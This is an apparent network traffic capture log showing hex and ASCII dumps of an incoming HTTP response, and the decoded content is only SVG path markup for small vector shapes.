                                                                                                                                                                              2023-09-15 05:28:20 UTC7859INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                              Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                              2023-09-15 05:28:20 UTC7875INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                              2023-09-15 05:28:20 UTC7891INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                              Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                              2023-09-15 05:28:20 UTC7907INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                              Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                              2023-09-15 05:28:20 UTC7923INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                              Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                              2023-09-15 05:28:20 UTC7939INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                              2023-09-15 05:28:20 UTC7955INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                              2023-09-15 05:28:20 UTC7971INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                              Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                              2023-09-15 05:28:20 UTC7987INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                              Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                              2023-09-15 05:28:20 UTC8003INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                              Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                              2023-09-15 05:28:20 UTC8019INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                              Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC8035INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                              2023-09-15 05:28:20 UTC8051INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                              2023-09-15 05:28:20 UTC8067INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                              Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                              2023-09-15 05:28:20 UTC8083INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                              Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC8099INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                              Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                              2023-09-15 05:28:20 UTC8115INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                              Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
